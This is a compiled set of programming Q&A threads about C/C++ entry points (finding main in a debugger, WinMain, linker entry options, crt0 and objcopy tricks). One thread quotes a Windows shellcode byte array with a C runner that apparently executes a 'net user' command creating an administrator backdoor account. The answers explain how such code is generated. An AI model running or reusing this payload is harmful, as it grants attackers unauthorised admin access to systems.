Find Main in Assembly - c++

I have simple C++ programm:
#include <iostream>
using namespace std;
void main()
{
cout << "Hello, world, from Visual C++!" << endl;
}
Compiled with following command: cl /EHsc hello.cpp
I want to start debugging of executable, How can I find this main function's corresponding assembly code in the debugger? (I'm using x64dbg)
Entry point is not same as Main function.
I found main function and it is somewhere not near with Entry Point, I had strings and I found this easily.
Is there any way or rule or best practise how to guess where is main's corresponding assmebly code?
EDIT:
I have source code, but I just learning RE.

Although the entry point is usually not the main defined in your executable, this is merely because it is quite common for compilers to to wrap main with some initialization code.
In most cases the initialization code is quite similar and has one of few versions per compiler. Most of those functions have an IDA FLIRT signature, and opening the binary with IDA will define an WinMain, main, etc function for you automatically. You can also use free (trial) versions of IDA for that.
If that's not the case, it's pretty straight forward to get from the entrypoint to the main, by following the few calls inside the entrypoint function one level deep. the main call is usually near the end of the entrypoint function.
Here's an example, main function is selected near the bottom (Note this is a unix executable compiled for windows using mingw, so this is somewhat different from most native win32 executables).

if you debugging own code - the best way to stop somewhere under debugger - use next code
if (IsDebuggerPresent()) __debugbreak();
so you can insert it at begin of your main or any other places.
if you debugging not own binary code - binary can at all not containing c/c++ CRT code - so question became senseless. however if CRT code exist, despite many different implementations - all use common patterns and after some practice - possible found where CRT code call main.
in case standard windows binaries, for which exist pdb files - this is not a problem at all

Generally, you can't.
When you compile a program, you get a binary and (optionally) debugging symbols.
If you have the debugging symbols, let IDA or your debugger load them, and then you should be able to symbolically evaluate main to the address of the function (e.g in IDA, just press g and write main and you'll be there. In WinDbg or gdb you can type b main)
However, the more common case would be to find the main function on a binary for which you do not posses the debugging symbols. In this case, you don't know where the main function is, nor if it is even there. The binary may not use the common libc practice of an entry point doing initialization and then calling main(int argc, char *argv[], char *envp[]).
But because you're an intelligent human, I'd recommended reading the libc implementation for the compiler/platform you think you're working with, and follow the logic from the platform-defined entry point until you see the call main instruction.
(Please note that .NET binaries and other types of binaries may behave completely differently.)

Related

How it is possible to have entry point other than main(), in Win32 projects in C++. (WinMain)

From the books i have read about C and C++ I understood that the entry point in C program must be main.Till now i had made only console applications and now im starting to learn about windows applications. So my questions is :
Why the entry point in Win32 project is not main (but WinMain) and how is it possible to be different ( maybe main calls WinMain ?) ?
ps. Sorry for bad english
It is true that C++ requires main to be the "entrypoint" of the program, at least under what's called "hosted implementations" (the ones you're probably using). This is why you get a linker error with GCC if you forgot to define a main.
However, in practice, the gap where your program ends and the "runtime" begins, makes things seem a little more wooly — when your program is launched, the first functions called are actually inside the runtime, which will eventually get around to invoking main. It is actually this invocation which causes the linker error if you forgot to define a main.
Microsoft has decided that, for Windows GUI programs, instead of invoking main, their runtime will invoke WinMain. As a consequence, you have to define a function WinMain for it to find, instead of main. Technically this violates the C++ standard, but it works because Microsoft makes it work.
The actual name and signature of the entry point in your code is dictated by the runtime framework you decide to use inside your EXE.
When the OS executes an EXE, it first calls an entry point specified in the EXE header by the linker, and is usually located in the compiler vendor's runtime library.
The runtime library's entry point initializes the library, sets up globals, etc, and then finally calls an entry point that your code must implement (the runtime library contains a reference to an external entry point, and the linker hooks up your code's entry point to that reference).
So, your code's entry point is whatever the runtime library requires it to be. The standard entry point for console apps in C/C++ is main, and the traditional entry point for Windows GUI apps is WinMain. But this is not a requirement as far as the OS is concerned.
In fact main is just a name look at assembly language: you are free to declare your Entry Point as you want eg:
.code
START:
ret
END START
But in C++ it doesn't allow you to define your own EP. So must implement the convention: for console you need main, wmain, win32: WinMain, for Dll: dllmain...

How is the shell code of a Buffer Overflow generated

The following codes got my curiosity. I always look, search, and study about the exploit so called "Buffer overflow". I want to know how the code was generated. How and why the code is running?
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
int main(int argc, char **argv){
int (*f)();
f = (int (*)())shellcode;(int)(*f)();
}
Thanks a lot fella's. ^_^
A simple way to generate such a code would be to write the desired functionality in C. Then compile it (not link) using say gcc as your compiler as
gcc -c shellcode.c
This will generate an object file shellcode.o . Now you can see the assembled code using objdump
odjdump -D shellcode.o
Now you can see the bytes corresponding to the instructions in your function.
Please remember though this will work only if your shellcode doesn't call any other function or doesn't reference any globals or strings. That is because the linker has yet not been invoked. If you want all the functionality, I will suggest you generate a shared binary (.so on *NIX and dll on Windows) while exporting the required function. Then you can find the start point of the function and copy bytes from there. You will also have to copy the bytes of all other functions and globals. You will also have to make sure that the shared library is compiled as a position independent library.
Also as mentioned above this code generated is specific to the target and won't work as is on other platforms.
Machine code instructions have been entered directly into the C program as data, then called with a function pointer. If the system allows this, the assembly can take any action allowed to the program, including launching other programs.
The code is specific to the particular processor it is targetted at.

switch easily between different main()

I'm using VS2010
I have a project with several headers and one file with the main() function.
For testing purposes I'd like to be able to easily another main() function that would instanciate different things than my original main.
Is there an easy way to define 2 "main" function, and easily switch between them?
The best would be to compile 2 binaries, one that starts at main1() and the other at main2(), or it can be a solution that requires to recompile some files, it doesn't matter
You are almost always better off using a separate compiled binary with a separate main.
First, "for testing purposes" might include code that should never be in the real binary -- such as test library code. That requires a second binary.
Second, if there is nothing that should be omitted, you still have the issue that anyone can supply an argument or copy and rename the binary to match argv[0] that will give this functionality.
I know it might be difficult to architect your project files to create separate real and test programs, but in most cases, you will have a much better result.
In linker options you have entry point name. This way you can have main1() and main2():
http://msdn.microsoft.com/en-us/library/f9t8842e(v=vs.80).aspx
"There can be only one" What you need to do is create a set of sub functions that main invokes biased upon conditions or though conditional compilation statements.
#ifdef TESTING
int main() {
/* whatever */
}
#else
int main() {
/* whatever else */
}
#endif
An application can only have one main. If you want to run two things, you need to do so in main, via:
The name of the executable run (hint: the first argv is the name of the executable)
Further command line parameters (program -thingone)
Lazily commenting out calls to functions which do something.
Besides specifying different entry points in the linker or having a real main() that calls whichever lower level function you want to pretend is a top level function, you could add a project for each main() you want.
This can be somewhat annoying in VS because separate projects aren't set up by default to share source code.. Some other IDEs make it easier have different executables (or other build products) built from different subsets of a shared set of source code, but I've never found that to be easy using VS's defaults.

Do you really need a main() in C++?

From what I can tell you can kick off all the action in a constructor when you create a global object. So do you really need a main() function in C++ or is it just legacy?
I can understand that it could be considered bad practice to do so. I'm just asking out of curiosity.
If you want to run your program on a hosted C++ implementation, you need a main function. That's just how things are defined. You can leave it empty if you want of course. On the technical side of things, the linker wants to resolve the main symbol that's used in the runtime library (which has no clue of your special intentions to omit it - it just still emits a call to it). If the Standard specified that main is optional, then of course implementations could come up with solutions, but that would need to happen in a parallel universe.
If you go with the "Execution starts in the constructor of my global object", beware that you set yourself up to many problems related to the order of constructions of namespace scope objects defined in different translation units (So what is the entry point? The answer is: You will have multiple entry points, and what entry point is executed first is unspecified!). In C++03 you aren't even guaranteed that cout is properly constructed (in C++0x you have a guarantee that it is, before any code tries to use it, as long as there is a preceeding include of <iostream>).
You don't have those problems and don't need to work around them (wich can be very tricky) if you properly start executing things in ::main.
As mentioned in the comments, there are however several systems that hide main from the user by having him tell the name of a class which is instantiated within main. This works similar to the following example
class MyApp {
public:
MyApp(std::vector<std::string> const& argv);
int run() {
/* code comes here */
return 0;
};
};
IMPLEMENT_APP(MyApp);
To the user of this system, it's completely hidden that there is a main function, but that macro would actually define such a main function as follows
#define IMPLEMENT_APP(AppClass) \
int main(int argc, char **argv) { \
AppClass m(std::vector<std::string>(argv, argv + argc)); \
return m.run(); \
}
This doesn't have the problem of unspecified order of construction mentioned above. The benefit of them is that they work with different forms of higher level entry points. For example, Windows GUI programs start up in a WinMain function - IMPLEMENT_APP could then define such a function instead on that platform.
Yes! You can do away with main.
Disclaimer: You asked if it were possible, not if it should be done. This is a totally un-supported, bad idea. I've done this myself, for reasons that I won't get into, but I am not recommending it. My purpose wasn't getting rid of main, but it can do that as well.
The basic steps are as follows:
Find crt0.c in your compiler's CRT source directory.
Add crt0.c to your project (a copy, not the original).
Find and remove the call to main from crt0.c.
Getting it to compile and link can be difficult; How difficult depends on which compiler and which compiler version.
Added
I just did it with Visual Studio 2008, so here are the exact steps you have to take to get it to work with that compiler.
Create a new C++ Win32 Console Application (click next and check Empty Project).
Add new item.. C++ File, but name it crt0.c (not .cpp).
Copy contents of C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\crt\src\crt0.c and paste into crt0.c.
Find mainret = _tmain(__argc, _targv, _tenviron); and comment it out.
Right-click on crt0.c and select Properties.
Set C/C++ -> General -> Additional Include Directories = "C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\crt\src".
Set C/C++ -> Preprocessor -> Preprocessor Definitions = _CRTBLD.
Click OK.
Right-click on the project name and select Properties.
Set C/C++ -> Code Generation -> Runtime Library = Multi-threaded Debug (/MTd) (*).
Click OK.
Add new item.. C++ File, name it whatever (app.cpp for this example).
Paste the code below into app.cpp and run it.
(*) You can't use the runtime DLL, you have to statically link to the runtime library.
#include <iostream>
class App
{
public: App()
{
std::cout << "Hello, World! I have no main!" << std::endl;
}
};
static App theApp;
Added
I removed the superflous exit call and the blurb about lifetime as I think we're all capable of understanding the consequences of removing main.
Ultra Necro
I just came across this answer and read both it and John Dibling's objections below. It was apparent that I didn't explain what the above procedure does and why that does indeed remove main from the program entirely.
John asserts that "there is always a main" in the CRT. Those words are not strictly correct, but the spirit of the statement is. Main is not a function provided by the CRT, you must add it yourself. The call to that function is in the CRT provided entry point function.
The entry point of every C/C++ program is a function in a module named 'crt0'. I'm not sure if this is a convention or part of the language specification, but every C/C++ compiler I've come across (which is a lot) uses it. This function basically does three things:
Initialize the CRT
Call main
Tear down
In the example above, the call is _tmain but that is some macro magic to allow for the various forms that 'main' can have, some of which are VS specific in this case.
What the above procedure does is it removes the module 'crt0' from the CRT and replaces it with a new one. This is why you can't use the Runtime DLL, there is already a function in that DLL with the same entry point name as the one we are adding (2). When you statically link, the CRT is a collection of .lib files, and the linker allows you to override .lib modules entirely. In this case a module with only one function.
Our new program contains the stock CRT, minus its CRT0 module, but with a CRT0 module of our own creation. In there we remove the call to main. So there is no main anywhere!
(2) You might think you could use the runtime DLL by renaming the entry point function in your crt0.c file, and changing the entry point in the linker settings. However, the compiler is unaware of the entry point change and the DLL contains an external reference to a 'main' function which you're not providing, so it would not compile.
Generally speaking, an application needs an entry point, and main is that entry point. The fact that initialization of globals might happen before main is pretty much irrelevant. If you're writing a console or GUI app you have to have a main for it to link, and it's only good practice to have that routine be responsible for the main execution of the app rather than use other features for bizarre unintended purposes.
Well, from the perspective of the C++ standard, yes, it's still required. But I suspect your question is of a different nature than that.
I think doing it the way you're thinking about would cause too many problems though.
For example, in many environments the return value from main is given as the status result from running the program as a whole. And that would be really hard to replicate from a constructor. Some bit of code could still call exit of course, but that seems like using a goto and would skip destruction of anything on the stack. You could try to fix things up by having a special exception you threw instead in order to generate an exit code other than 0.
But then you still run into the problem of the order of execution of global constructors not being defined. That means that in any particular constructor for a global object you won't be able to make any assumptions about whether or not any other global object yet exists.
You could try to solve the constructor order problem by just saying each constructor gets its own thread, and if you want to access any other global objects you have to wait on a condition variable until they say they're constructed. That's just asking for deadlocks though, and those deadlocks would be really hard to debug. You'd also have the issue of which thread exiting with the special 'return value from the program' exception would constitute the real return value of the program as a whole.
I think those two issues are killers if you want to get rid of main.
And I can't think of a language that doesn't have some basic equivalent to main. In Java, for example, there is an externally supplied class name who's main static function is called. In Python, there's the __main__ module. In perl there's the script you specify on the command line.
If you have more than one global object being constructed, there is no guarantee as to which constructor will run first.
If you are building static or dynamic library code then you don't need to define main yourself, but you will still wind up running in some program that has it.
If you are coding for windows, do not do this.
Running your app entirely from within the constructor of a global object may work just fine for quite awhile, but sooner or later you will make a call to the wrong function and end up with a program that terminates without warning.
Global object constructors run during the startup of the C runtime.
The C runtime startup code runs during the DLLMain of the C runtime DLL
During DLLMain, you are holding the DLL loader lock.
Tring to load another DLL while already holding the DLL loader lock results in a swift death for your process.
Compiling your entire app into a single executable won't save you - many Win32 calls have the potential to quietly load system DLLs.
There are implementations where global objects are not possible, or where non-trivial constructors are not possible for such objects (especially in the mobile and embedded realms).

in c++ main function is the entry point to program how i can change it to an other function?

I was asked an interview question to change the entry point of a C or C++ program from main() to any other function. How is it possible?
In standard C (and, I believe, C++ as well), you can't, at least not for a hosted environment (but see below). The standard specifies that the starting point for the C code is main. The standard (c99) doesn't leave much scope for argument:
5.1.2.2.1 Program startup: (1) The function called at program startup is named main.
That's it. It then waffles on a bit about parameters and return values but there's really no leeway there for changing the name.
That's for a hosted environment. The standard also allows for a freestanding environment (i.e., no OS, for things like embedded systems). For a freestanding environment:
In a freestanding environment (in which C program execution may take place without any benefit of an operating system), the name and type of the function called at program startup are implementation-defined. Any library facilities available to a freestanding program, other than the minimal set required by clause 4, are implementation-defined.
You can use "trickery" in C implementations so that you can make it look like main isn't the entry point. This is in fact what early Windows compliers did to mark WinMain as the start point.
First way: a linker may include some pre-main startup code in a file like start.o and it is this piece of code which runs to set up the C environment then call main. There's nothing to stop you replacing that with something that calls bob instead.
Second way: some linkers provide that very option with a command-line switch so that you can change it without recompiling the startup code.
Third way: you can link with this piece of code:
int main (int c, char *v[]) { return bob (c, v); }
and then your entry point for your code is seemingly bob rather than main.
However, all this, while of possibly academic interest, doesn't change the fact that I can't think of one single solitary situation in my many decades of cutting code, where this would be either necessary or desirable.
I would be asking the interviewer: why would you want to do this?
The entry point is actually the _start function (implemented in crt1.o) .
The _start function prepares the command line arguments and then calls main(int argc,char* argv[], char* env[]),
you can change the entry point from _start to mystart by setting a linker parameter:
g++ file.o -Wl,-emystart -o runme
Of course, this is a replacement for the entry point _start so you won't get the command line arguments:
void mystart(){
}
Note that global/static variables that have constructors or destructors must be initialized at the beginning of the application and destroyed at the end. Keep that in mind if you are planning on bypassing the default entry point which does it automatically.
From C++ standard docs 3.6.1 Main Function,
A program shall contain a global function called main, which is the designated start of the program. It is implementation-defined
whether a program in a freestanding environment is required to define a main function.
So, it does depend on your compiler/linker...
If you are on VS2010, this could give you some idea
As it is easy to understand, this is not mandated by the C++ standard and falls in the domain of 'implemenation specific behavior'.
This is highly speculative, but you might have a static initializer instead of main:
#include <iostream>
int mymain()
{
std::cout << "mymain";
exit(0);
}
static int sRetVal = mymain();
int main()
{
std::cout << "never get here";
}
You might even make it 'Java-like', by putting the stuff in a constructor:
#include <iostream>
class MyApplication
{
public:
MyApplication()
{
std::cout << "mymain";
exit(0);
}
};
static MyApplication sMyApplication;
int main()
{
std::cout << "never get here";
}
Now. The interviewer might have thought about these, but I'd personally never use them. The reasons are:
It's non-conventional. People won't understand it, it's nontrivial to find the entry point.
Static initialization order is nondeterministic. Put in another static variable and you'll never now if it gets initialized.
That said, I've seen it being used in production instead of init() for library initializers. The caveat is, on windows, (from experience) your statics in a DLL might or might not get initialized based on usage.
Modify the crt object that actually calls the main() function, or provide your own (don't forget to disable linking of the normal one).
With gcc, declare the function with attribute((constructor)) and gcc will execute this function before any other code including main.
For Solaris Based Systems I have found this. You can use the .init section for every platforms I guess:
pragma init (function [, function]...)
Source:
This pragma causes each listed function to be called during initialization (before main) or during shared module loading, by adding a call to the .init section.
It's very simple:
As you should know when you use constants in c, the compiler execute a kind of 'macro' changing the name of the constant for the respective value.
just include a #define argument in the beginning of your code with the name of start-up function followed by the name main:
Example:
#define my_start-up_function (main)
I think it is easy to remove the undesired main() symbol from the object before linking.
Unfortunately the entry point option for g++ is not working for me(the binary crashes before entering the entry point). So I strip undesired entry-point from object file.
Suppose we have two sources that contain entry point function.
target.c contains the main() we do not want.
our_code.c contains the testmain() we want to be the entry point.
After compiling(g++ -c option) we can get the following object files.
target.o, that contains the main() we do not want.
our_code.o that contains the testmain() we want to be the entry point.
So we can use the objcopy to strip undesired main() function.
objcopy --strip-symbol=main target.o
We can redefine testmain() to main() using objcopy too.
objcopy --redefine-sym testmain=main our_code.o
And then we can link both of them into binary.
g++ target.o our_code.o -o our_binary.bin
This works for me. Now when we run our_binary.bin the entry point is our_code.o:main() symbol which refers to our_code.c::testmain() function.
On windows there is another (rather unorthodox) way to change the entry point of a program: TLS. See this for more explanations: http://isc.sans.edu/diary.html?storyid=6655
Yes,
We can change the main function name to any other name for eg. Start, bob, rem etc.
How does the compiler knows that it has to search for the main() in the entire code ?
Nothing is automatic in programming.
somebody has done some work to make it looks automatic for us.
so it has been defined in the start up file that the compiler should search for main().
we can change the name main to anything else eg. Bob and then the compiler will be searching for Bob() only.
Changing a value in Linker Settings will override the entry point. i.e., MFC applications use a value of 'Windows (/SUBSYSTEM:WINDOWS)' to change entry point from main() to CWinApp::WinMain().
Right clicking on solution > Properties > Linker > System > Subsystem > Windows (/SUBSYSTEM:WINDOWS)
...
Very practical benefit to modifying entry point:
MFC is a framework we take advantage of to write Windows applications in C++. I know it's ancient, but my company maintains one for legacy reasons! You will not find a main() in MFC code. MSDN says the entry point is WinMain(), instead. Thus, you can override the WinMain() of your base CWinApp object. Or, most people override CWinApp::InitInstance() because the base WinMain() will call it.
Disclaimer: I use empty parentheses to denote a method, without caring how many arguments.